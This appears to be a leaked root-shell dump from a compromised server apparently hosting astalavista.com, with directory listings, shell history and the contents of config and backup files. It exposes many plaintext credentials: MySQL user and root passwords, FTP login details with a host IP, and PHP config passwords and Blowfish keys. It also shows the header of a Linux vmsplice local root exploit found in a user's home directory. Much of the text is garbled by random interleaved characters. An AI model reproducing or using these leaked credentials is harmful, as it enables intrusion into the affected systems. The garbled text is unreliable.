-rw-r–r– 1 root root 16095 Sep 11 2007 install.log + O' O/ U1 f% e. Q: }. q0 I-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog 2 r( @, R5 n8 c0 x- A3 Z6 K-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh ! Q7 v% U! V* N1 ^1 c# k! ^ ^-rw——- 1 root root 35 Jun 2 14:23 .lesshst; e7 h5 p3 R, h- y* a5 ~
drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp 4 y! O$ y ^9 o" ^# j' N% ~drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec + Z" p+ ]$ E: u& A-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz + P2 D! s6 g5 |! O2 I! Q3 S-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz20 s, W+ M) L* P: | Z& D
-rwx—— 1 root root 760 Sep 18 2008 lp 5 V. x( S4 a9 d6 Hdrwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.18 a q: F4 o. Z4 j# Y
-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz& M+ K0 z I' C0 S
-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1 / i3 N7 Q7 {) \7 Hdrwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9 0 K9 \9 [4 V6 `: f) u g7 X( l-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz5 N, u+ Q$ @5 d( Y8 _' |
drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3- u+ G, x& ^: T+ y7 H# A+ s
-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz 1 @- Z% I. M% R; o) d-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh3 {! s7 u' N$ u, }4 ~7 v
-rw——- 1 root root 41 Oct 19 2007 .my.cnf 5 n: y- n" g1 V6 s, a8 D-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history + V" H9 G, j. z, @3 D& b4 ?( G-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport7 u) k T) S& ~4 h8 e5 e3 A
-rw——- 1 root root 41 May 20 2008 .mytop 5 T% m* n4 w8 o; m& x% |drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6 2 @: n9 }* T% t; i8 D-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz- j0 `+ V$ y3 ?) `& \, D8 G) a, ^
drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp& t! s6 W/ X0 i6 z& | V1 ~
-rw——- 1 root root 1462 Sep 21 2007 opt.php . \& Y9 K. T. x4 H6 x-rw-r–r– 1 root root 3371 Sep 22 2007 p& ~4 [; _8 p% y+ J$ O4 e6 J" x7 f0 D
-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2 - w, ]) M2 x/ [-rw——- 1 root root 1024 Feb 3 21:32 .rnd . k& P1 d6 V/ f" U9 j-rw-r–r– 1 root root 716 Nov 28 2007 server.csr' d9 m9 R: z7 z3 l2 A* I
-rw-r–r– 1 root root 887 Nov 28 2007 server.key: x% i+ q3 `+ h! w# L4 \
drwx—— 2 root root 4096 Oct 10 2008 .ssh- S2 e1 }- F5 z5 g% [: g
-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat 9 _ F/ m/ D0 U, D-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc ! y8 i' z O4 k6 p- x9 W-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip+ q. w. R8 r- Z* \% l1 d8 k" i n
-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1; @$ A3 I: T! F
drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp 5 ]5 O; t G% b. m( i0 w-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh % b$ Q9 ~0 j/ t& q3 A, R5 _6 Qdrwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0+ w8 u6 W6 o! c$ d
-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz24 `& T" Z6 S4 S4 j. f! e
-rw——- 1 root root 12997 May 16 2008 .viminfo) {2 v: Y5 H& L* L. i- H0 v% o
6 p- C8 d- A/ E1 csh-3.2# cat .bash_history2 F$ ?5 m3 s, h
[snip] % F- N% c; y h* t8 N9 _wget cp4sst.com/sstlinux.tar.gz & N# [0 A" t! t! l: @tar zxvf sstlinux.tar.gz # q) X' c) o2 A4 dcd linux-2.6.27.10( J! E3 `: a7 v3 m) q& H
sh install.sh4 b' T3 }1 M% Y6 a$ c& Z
make bzImage ; make modules ; make modules_install ; make install 5 g7 W' `: _0 J0 S) omake clean. I Q" `. [) t' Q
service mysqld restart : |7 ?, h- U6 ]' Y- l: ~[snip] ; _5 h1 U9 |0 z1 F2 ]cd /usr/sbin/' d8 |3 Z) x: l7 n7 h% U6 v
chmod 4777 traceroute ( g+ Q; V ?; t; tchmod 4777 ping ) h; w! p e' f7 r" vtraceroute -I 链接标记[url]www.astalavista.ch[/url]7 {" q) @; t7 O* T, ~/ z9 x' f
[snip] ' T5 G8 @" ?7 i) t \6 K# Tvi /etc/csf/csf.conf8 s$ A4 F+ H8 }5 K' B# z& g6 R) D7 s
traceroute google.ch( `- r. o: d% m. T
service csf restart# j3 }/ ~" Z1 q6 Y' O! A
tracert google.ch ) C- Q4 Q8 [7 |service csf restart- t. R/ R# }! Y) {4 Y: Y& U6 _2 ]
traceroute 链接标记[url]www.google.ch[/url]1 {$ u3 d1 P; B1 x7 h- M( Z7 a
tracert 链接标记[url]www.google.ch[/url] / M' z o6 z! O4 Etraceroute 链接标记[url]www.google.ch[/url]9 Z) ^2 N4 o3 L" H: j1 r( w5 L% |" t6 H
locate traceroute) \* Q3 \7 @; [5 X- d' z; R
chown 4755 /bin/traceroute$ v3 g9 g8 J# R" q2 ?0 S
chown 4777 /bin/traceroute & J6 F. Z5 g$ K/ l2 s/ Clocate ping : q8 E j) [1 d. E1 ichown 4755 /bin/ping 4 u7 W$ S8 X ]& v6 {chown 4777 /bin/ping % q, k! c& @0 {4 F: }+ W; | ccd /bin/, }! M' x. y* c* l6 `+ b0 B* p
ls -ali | grep ping 9 ?. m, {1 O6 I# i5 G- a Q) Y! ?1 Zchown root ping + [( U; ]7 y' W* ~& |' ^chmod 4755 ping9 K; o, A4 }: x: @0 h1 b! w
ls -ali | grep traceroute) k" U+ P7 e5 _
chown root traceroute _" a7 p9 |+ @0 O# Y
chmod 4755 traceroute9 }9 l$ E/ U# I) r
ls -ali | grep traceroute, c+ p$ b- `4 B0 w6 l* x0 ^
traceroute -I 链接标记[url]www.google.ch[/url]% I2 q/ n. q( H9 e
traceroute 链接标记[url]www.google.ch[/url]8 l1 q9 Z6 }" R- a- C
whois pmsantos.ch 0 t; G8 J% x" a F: |$ j! L[snip]* O: W; [2 j" s1 ?3 Y
mysql -h com_contrexx2_live < /root/defaultp_ports.sql3 n3 C+ g) W, C- h! t
mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql 6 [/ L, \% Q' y- _mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql + M7 X# R1 _# ~! \7 S- C8 f Omysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql ) D0 z" E. ^! a$ ?" }# ]top # Y. _5 [( ~, G6 W6 x- H2 `( lping ssth.ch 5 V+ t% E: D: qping asdlkfaljgasd???ljg???lasj.ch , \/ O! O. l( lping asdlkfaljgasdlasj.ch . ~9 S* Q+ O& b( U( `8 c0 C, x3 x9 Dping 链接标记[url]www.ssth.ch[/url] 8 F- u3 p* V2 zping ssth.ch% _8 q* |: n l7 [( I' @/ a
nslookup 链接标记[url]www.google.ch[/url] , D: O4 c9 P/ n% Inslookup 链接标记[url]www.ssth.ch[/url]" L I# G+ }) s$ | b3 j
man nslookup 9 R! r6 h+ v1 Y' [) jping 链接标记[url]www.google.ch[/url] , h$ }5 J4 S( V2 k% w' X5 fnslookup 链接标记[url]www.google.ch[/url]- P% K- q( @" T2 q* |% m
nslookup 链接标记[url]www.google.ch[/url] 5 L3 ^: m2 X! k, u: ?nslookup salfjasdlf.ch' T6 N5 l& S5 _$ z0 _
[snip], b% y l- {* Y, W
openssl passwd -1 sadf1 Q% i& _+ }3 C: _
openssl passwd -1 5cZNHstdTy+ }* Y8 T6 j: V; l* m6 i; q
mysql ) J3 N9 K) h! F6 amysql7 x) d: e; s7 Z. Y6 h
locate proftp8 g* f+ r& Q4 R! ~, @$ q6 S* O
vi /etc/proftpd.passwd0 f: e) X. ]7 p5 _; V5 G0 J
service proftpd restart. f, G3 W/ r# M$ f
locate proftpd.conf& F7 |" }* U/ U1 H" v
vi /etc/proftpd.conf7 d, J0 a* v% n- ]" D, i5 I; m
vi /etc/proftpd.passwd * ]$ u2 E( y& U0 \1 x( |& p' Iservice proftpd restart 8 F, G0 X, l' i, m[snip] % H [( H& [5 b% z1 t/ W" C V; u6 d/bin/sh /home/com/backup_system/backup.sh# _# c2 ~ _* w4 _
tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin2 {) G! Q# h8 N! G
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql* R# t( R+ x2 j* b7 E% y9 x& M
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql : X- G: z+ ]/ A W4 R- rls -ali1 k& t- d9 R9 n2 R8 \! G
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql" K R9 W) T+ r
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql1 Y* e4 |/ y% P; _& ]0 s
crontab -l* c7 {5 ?; ]6 A6 M6 x: i
crontab -l; M# }5 O W3 b/ {
php -q /home/com/public_html/modifications/cronjobs/securitynews.php % X) R% A3 R' s+ J/home/com/public_html/modifications/cronjobs/exploits.sh+ |& c; z J/ }
wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]8 I+ m) S4 Y' F* |
tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz: h/ _! O3 Y1 o% z3 j) f7 z3 [
cd lsws-4.0.32 m1 h( e6 \3 H0 b7 A; D/ W
sh install.sh 6 _! ^) V4 U: U- suptime $ P3 Z2 U: N# W. H1 A% W5 Jhdparm -tt /dev/sda0 M) a# k+ S" f! B4 A( d
iostat ' H( w7 H& w) h4 z; l- y% t' Iyum install iostat6 f& ~* K+ h% a9 {' _/ Z& |- [3 J
iostat + _2 Q8 ]( X# \9 ywhereis iostat: q; Y( F: z7 I8 _3 J- ~
yjm clean all9 P: U2 Q9 z- ~* f* b, Y2 @7 D
yum clean all ; yum -y update 8 K8 ]) b3 S5 x$ K4 k- i, piostat0 p' U7 s! e! @2 B+ X$ }* r
yum install systat 5 w9 ^* v4 p+ S; b7 }- K9 M. `rpm -qa | grep iostat 1 L- H7 a( P' k# H g: jrpm -qa | grep sysstat & `, }! R) |1 h! O+ c trpm -qa | grep systat ' v; u! _4 L$ g. f$ l2 w( zdmesg -c 8 F8 A2 T, V; ^6 Gsysctl -p$ I- O( L8 g) w7 n( K
uname -r+ d2 \6 T8 [$ R3 E( K
cd /usr/src / \' { w3 u2 w n3 i/ B9 U0 |' Q0 dwget nix101.com/kernels/sstlinux.tar.gz. \! v# ^" c) \2 `; m8 [9 w5 f
shutdown -r now ) l- a0 G# a. K2 pnano -w /boot/grub/grub.conf 6 T1 J/ H% I D+ j" {6 [" N- \- y! a% x$ w! d; Q; u c" _
sh-3.2# cat .my.cnf2 n' u6 J% v, \- o: R
[client]) y R. x5 U7 ?
user=da_admin 7 A5 n/ D( o/ o6 }& k* ?8 Z& qpassword=X9dctmRH 0 |, ~* o/ n: @1 L% ]3 N, R5 F9 q! H+ t4 W( w4 W$ g* m0 o5 W3 U+ R4 k- c) T
sh-3.2# cat /home/com/backup_system/backup.sh, Y e! t! a6 S I. m8 ^+ U& W
#!/bin/sh1 I) ~* {; f' \/ T) }
#####################################################################9 [, L( p) [0 t7 ~3 n& B; r
# #! d% b& A# u, e
# incremental backup for astalavista.com # , E \5 B' U8 r, S0 t3 o" Z7 v# #+ U" ?, ~% p) _6 u
# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> # . K; {# y2 b) F# #( f4 ]2 `( g% f& e9 D
##################################################################### - m* T: p) ~8 V[snip]/ Z M4 A' n9 Q# @/ y3 Y$ B; O
PROG_DIR=”/home/com/backup_system”;( q3 i: t* S0 l' v& v1 s
BACKUP_DIR=”/home/com/backups”; : R6 I& V% H ^; |( d! cDOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;0 @; u4 v9 P! R+ ^# u. A
# ftp for synology backup server " ^8 @% \8 W" y2 S# EFTP_HOST=”212.254.194.163″;4 L7 m |5 e) Y% V: j; f4 P1 K$ ~7 O1 `
FTP_PORT=”21″; - p7 l$ T1 X( I! O: b8 S4 k/ qFTP_USER=”astalavista.com”;6 p: w' q* Z2 [. ]3 d) y
FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;$ d) l, c6 m% J4 Y
FTP_DIR=”/astalavista.com”; ! C" B& M1 e& V8 F1 z' h/ @) N5 ]# database7 J0 n0 P% V0 m9 _; y
DB_HOST=”localhost”;* s2 a+ j4 z2 G/ Z* A4 a5 B
DB_USER=”contrexxuser2″;1 [3 V# z0 _7 I) u5 w4 A
DB_PASS=”0fEYNZgXz1pKe”; 4 |. B( T0 x1 g- y8 A8 A, KDB_DATABASE1=”com_contrexx2_live”;; } `. `# d# E) v. U/ O3 u; W
DB_DATABASE2=”com_contrexx2″; 7 }" V" ? G) I[snip] . ] s% M. Y* m+ l# K9 F; yftp -in $FTP_HOST $FTP_PORT <<EOF - ^: q$ Y0 q! h8 l$ R9 oquote USER $FTP_USER3 @! q8 x* y3 ~5 h3 T1 [# `
quote PASS $FTP_PASS* [9 H: k. ~5 X
cd $FTP_DIR5 J+ v0 }3 B; P
put $DB_FULLNAME-SQL_Dump.tar2 u- j! t1 e9 ]! l. r: y- P
put $BACKUP_FULLNAME-Public_HTML.tar 2 c7 s; v' p1 h" fclose . Z, V6 r. s3 _9 X2 m2 B" I9 ]bye. ~. D" t( r$ g* E) w6 i3 C
EOF' M5 L r7 C: o
! N/ n. @2 O% G! ], j3 f9 O. C1 P
sh-3.2# cd /home * d# P# n& C: H8 s8 Tsh-3.2# ls -la& L' }' Q$ t3 @. S6 |; f& [
total 120 5 m; ?& ?4 F2 ?' `' q0 J0 rdrwxr-xr-x 14 root root 4096 Mar 11 17:56 . 3 v7 R% ^) n9 j9 l5 p; {drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..! d4 N- j+ q3 E5 ~$ I) |
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin6 N. X- r. Y0 r' }: q
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group & d3 q% N9 @4 v2 r0 c-rw——- 1 root root 8192 Jun 3 02:45 aquota.user & e3 ]) g2 P- P4 hdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet # ^! Y F% W1 d) Tdrwxr-xr-x 2 root root 4096 Jul 29 2008 backup, I" f7 c g4 r- S
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161/ s1 E% q6 U! J! \2 \" Z' g8 y
drwx–x–x 10 com com 4096 Apr 28 12:40 com % }: H0 J T1 S4 ]( X1 Wdrwxr-xr-x 2 root root 4096 May 17 2007 ftp$ z# G8 `' s1 W
drwx—— 3 jon jon 4096 Sep 21 2007 jon ! W- S L# d* O( n/ ?% L8 |; X" jdrwx—— 2 root root 16384 Sep 11 2007 lost+found) h) ?# ?/ k y/ F
drwxr-xr-x 2 root root 4096 Sep 14 2007 my , I, |8 h4 w3 l5 P5 \6 Z1 C$ Hdrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata# e% ]1 y/ U/ }# e$ {
drwx—— 2 jon jon 4096 Sep 15 2007 test 9 C$ f# Z R# K& D& \drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp# P g& v; }- }- l! f v2 `
! S# d* I0 ?# k
sh-3.2# cd admin $ ]: w I# g2 ]6 Y: fsh-3.2# ls -la + R9 y; P. }* U! Q% B$ dtotal 1735896& V" Z2 I5 }4 w& ], }7 H4 R5 X
drwx–x–x 9 admin admin 4096 Nov 28 2007 .2 J J" u8 H/ U( E! ^3 E
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .. 7 E" L9 L: M& U' H* k# a: ldrwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups( b9 u1 ?7 l0 ~: W
drwx—— 2 admin admin 4096 Sep 28 2007 backups) P6 \7 M/ \' j2 f
-rw——- 1 admin admin 860 Sep 17 2008 .bash_history * |% w0 b4 m1 S8 l. o-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout8 ~' v7 |2 N+ @& F
-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile 2 Z/ O, M, O) p7 s% o2 L' w& H) x-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc: b' G% n4 B& }4 v9 W" p! k" R
drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups 9 o3 T. K% q& e! l# Udrwx–x–x 6 admin admin 4096 Sep 21 2007 domains # X8 U! ~! N9 Q% udrwxrwx— 3 admin mail 4096 Sep 21 2007 imap 7 S V# @, F0 u0 {3 x% a-rw-r–r– 1 root root 24 Sep 21 2007 info.php . ?4 ~9 v$ R0 I" R4 D5 ddrwx—— 2 admin admin 4096 Sep 21 2007 mail K" v% L+ D/ A5 p F
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr . V: p( \' J; P; O8 v-rw-r–r– 1 root root 887 Nov 28 2007 server.key " ]: s S7 z0 r$ `2 r' `& ]1 x-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow . |; K& p+ J; c6 a- b8 v& ?-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz ( V& F7 M8 u2 r* c+ p0 ldrwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups7 k7 K; x7 @3 R: E( T3 }0 r
/ k+ |' T* {7 Y
sh-3.2# ..: }8 g8 k* R0 p2 G& D& K
sh-3.2# cd jon $ f4 u; Z* R4 [7 L9 d9 ]sh-3.2# ls -la" ^# o! W+ t4 L0 t8 T4 I
total 36! L: [: W7 J: t1 o1 R) z
drwx—— 3 jon jon 4096 Sep 21 2007 . ; x& H( C. ?5 fdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..; B* A/ P! Q& C7 O
-rw——- 1 jon jon 53 Sep 21 2007 .bash_history ! r. K5 x; G- E-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout ( b. C% c9 u' h. I4 ]9 g1 m-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile5 N- L8 L. S" v6 T2 V% u0 E
-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc % K4 Y1 E- U4 s' t) c-rw-r–r– 1 root root 24 Sep 21 2007 info.php 8 H: Z# K4 ?& n# N. }2 o- M7 Tdrwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html ) c0 o: |. F" T3 e1 E! l. u. ?5 X9 n+ g0 L+ {: a; Y$ B' W
sh-3.2# cd ..; a" P& L/ a1 v# |* T
sh-3.2# cd test ( j5 p3 U8 C7 r8 M' \! G( Csh-3.2# ls -la # n: p6 O x- Q+ ftotal 48% ?8 D3 e, m, D
drwx—— 2 jon jon 4096 Sep 15 2007 . 5 N! |" w: F' l9 Fdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..+ s# O j' Q3 w% j
-rw——- 1 jon jon 79 Sep 21 2007 .bash_history V5 m0 N: k" i- ?' v5 Y-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout" g. B$ ^5 E n: i$ ]0 f( O
-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile 3 W/ l" R* K5 f% v-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc ) B: b; Q. F' \sh-3.2# cat .bash_history & z7 | B% V: D# ^5 O/ G/usr/bin/mysqladmin -u root password PoliuJhytg67 . ^3 A# O8 x8 M u2 p1 P3 M) e( W1 [- z2 `
sh-3.2# cd ..9 u' Y2 X! y5 \- X* r3 b1 Q( w
sh-3.2# cd astanet ; P7 i6 T0 |6 w# \$ [* |, ssh-3.2# ls -la2 i. F5 F0 J' e0 @
total 52 6 c+ v4 j% M+ e' @' qdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 . ' u" [: G P+ e( n6 jdrwxr-xr-x 14 root root 4096 Mar 11 17:56 .. " m' i) k! v6 E& o' a) O' cdrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth 6 m+ V0 N5 M V* z0 r" N' V k-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history 7 W6 c/ p" O- _1 T2 l3 y-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout" u6 m. ~8 r5 m
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile0 s: e( D: s1 X* {+ Y! b
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc1 @1 F- j8 X* u8 k F* J% \
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains 6 K+ k* ~' W Xdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap+ ?$ a2 _. ^5 R; @; Q
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail ' \* J( r6 ]& d$ ]$ S9 Y-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history+ U6 P: E' x/ y1 }, Y( R. j
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html/ p- m( _% e- T/ I I1 ]
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow 3 J p" v8 h# R0 n: i# N7 y& u( m& s) `; [5 L8 }6 D9 M
sh-3.2# cd auth// z, y1 J4 O( L6 ?# L
sh-3.2# ls -la1 C5 H9 M& M3 L* V6 V* V, q
total 283 M/ _/ }0 k/ m
drwxr-xr-x 2 root root 4096 Dec 23 16:00 .+ s6 j* a, N" ^/ c; D8 G/ {7 ~" q
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..# b- ` e$ T, u3 S; M
-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php * h' E3 \; s/ y! ?: W9 V-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php1 ^; R% m+ Y8 A+ E. P# E& |, ~
-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd A. x9 ^5 G, h
-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting & y: G( i9 x. {6 U4 i1 v; M-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd " s, E' @5 ]. W6 P$ G0 h: B* F5 W! c
sh-3.2# cat hackercontest.config.inc.php - \8 {# _( i( p. [' N) R" t% u<?PHP + W, U! P# U* t+ }// Variabeln f?r Verbindung zur Datenbank // 0 p( O+ \7 Q! L$conxHost = ‘localhost’; // MySQL hostname " ?& J( `( H+ L/ S) O, d9 K9 M$conxUser = ‘hackercontest’; // MySQL user. @# N4 w' |% g% X J, v
$conxPassword = ‘K6m@7dUc’; // MySQL password : F$ r" i _& K- C0 d$ F$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish 1 U1 z1 m) N. Y) O?> * d$ o( s; H7 d9 E; a2 B' ?2 zsh-3.2# cat hosting.config.inc.php 7 ?5 D; ], G* f4 ]' f- U0 {<?PHP n* @: \- F9 ]0 \5 s0 v
// Variabeln f?r Verbindung zur Datenbank //) H3 p2 ^7 h {9 p- g" i7 u1 O% ]6 U
$conxHost = ‘localhost’; // MySQL hostname5 u# V, n6 R) T
$conxUser = ‘hostinguser’; // MySQL user ( l1 z% Q. P' m+ O' d/ f, A$conxPassword = ‘cXvB3981′; // MySQL password: v# n2 B9 ~" ?+ i; `1 v& I
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish# s7 i+ @* N; K- z. q/ ?2 L. R
?>- `3 I* d& h/ T2 e9 S# Q( ], W
9 X w J7 W7 q7 W8 }sh-3.2# cd ..% y6 T+ p9 T1 `. ]- @9 w. n) R4 t L
sh-3.2# cd com& L5 r' j8 V2 ?! u
sh-3.2# ls -la* s) O& q" a, F% [
total 141208 ' b, ~: Q! P3 k) u& ?* Sdrwx–x–x 10 com com 4096 Apr 28 12:40 .; x+ P ]5 `8 P, S) t9 @
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .. ' J) x3 V+ L" C m- s8 O+ ?drwx—— 2 com com 4096 Jun 4 04:04 backups- E/ S! }# t6 J7 R8 ~2 {
-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql. ^# m v0 u T+ ]9 [% H- O* z
drwxr-xr-x 2 com com 4096 May 12 15:20 backup_system% x6 a( x) e& Z6 J
-rw——- 1 com com 21880 Jun 2 08:07 .bash_history : p6 J, y Q3 r7 E( {-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout& b$ N* I+ }4 k- g
-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile : m* E2 e9 V9 x8 L8 @-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc : z8 b( o& Y8 @6 j" S. zdrwx–x–x 3 com com 4096 Jan 29 2008 domains " l% b3 C9 l* w+ D-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed ! q, J$ h6 z5 k1 Z# udrwxrwx— 3 com mail 4096 Jan 6 19:24 imap 4 }/ v" Y3 Q) {% |-rw——- 1 com com 69 Nov 18 2008 .lesshst / {( `) Q1 V1 a0 J. ndrwx—— 2 com com 4096 Sep 24 2007 mail) m) q; O5 |, L& h/ g
-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history : u* @4 a% v7 b% _drwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp; }$ a. t" a- c) p7 @. ~; x2 v L
lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html 1 V0 L$ F" W. x% L-rw-r—– 1 com mail 34 Sep 24 2007 .shadow , a1 M, |% x2 U9 A* h& P9 \drwx—— 2 com com 4096 Aug 26 2008 .ssh/ Z" ~- \2 x' t! [; E, a
-rwx—— 1 com com 8515 Feb 10 2008 t 4 @4 d. o8 V6 m, R1 a% \-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c ! S% @ l- ^. E/ u! ldrwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp ( Q0 A) e9 w0 g. }: Y/ \ y-rw-rw-r– 1 com com 617 May 20 2008 .toprc; M- X% h! V; m# Q8 r' ^' Y; X
-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql 1 S- a+ O$ O/ W7 \-rw——- 1 com com 16629 Mar 28 21:46 .viminfo( I ?+ ^3 k- H0 G: f$ B. H) h
-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc / i7 V% {: V' `) i0 E! @# L" d# O! _9 u
sh-3.2# head t.c + i: T4 N# a8 ]" V, J3 n- E/*2 R) h8 h1 h8 |
* jessica_biel_naked_in_my_bed.c; a+ ]6 J5 o- v, y
* * |% v/ g# x) I- Z8 S2 v$ A( ]! ?* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura. 0 C7 ~% T q- x( f0 i4 F# p* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.% H4 I% \/ i8 E' h
* Stejnak je to stare jak cyp a aj jakesyk rozbite.( v1 H) y6 r+ B2 y6 c, A1 [
*) V2 U4 v. o: Q! {9 \7 ?4 T$ R
* Linux vmsplice Local Root Exploit % X% f/ b; j- b* T+ X" B. D* By qaaz2 R( a! n: K* r- c1 T' N
** R c: N4 ~: e; E
3 z( N3 [/ @# p% {sh-3.2# cd / $ F- p6 J6 V0 b4 ?) \( D: Osh-3.2# ls -la % B3 G: v( e- Y* x% ]6 g' ztotal 360 6 _! g; l" Q* v0 G9 ^drwxr-xr-x 25 root root 4096 Jun 3 02:43 . 4 e* U5 ]9 V: k: _( H4 pdrwxr-xr-x 25 root root 4096 Jun 3 02:43 .. ' K$ c0 ^! e$ Q) n- D7 }0 B-rw——- 1 root root 10240 Jun 3 02:39 aquota.group ; E4 a! E1 u% i6 i1 o1 C3 N% e-rw——- 1 root root 10240 Jun 3 02:39 aquota.user 1 S$ o' x, s) I* U" z# y-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db4 Q& j$ ]/ q( m0 k8 N' ~9 e
-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck: L8 ?2 {( H; ]# f8 W) G. \( ^3 m
-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel8 g5 v$ d" O0 E9 d" t/ F& ^
drwxr-xr-x 3 root root 4096 Dec 29 2007 backup9 E# [. ^) M; x
drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin2 ^1 `$ K4 \" C7 `# W; _
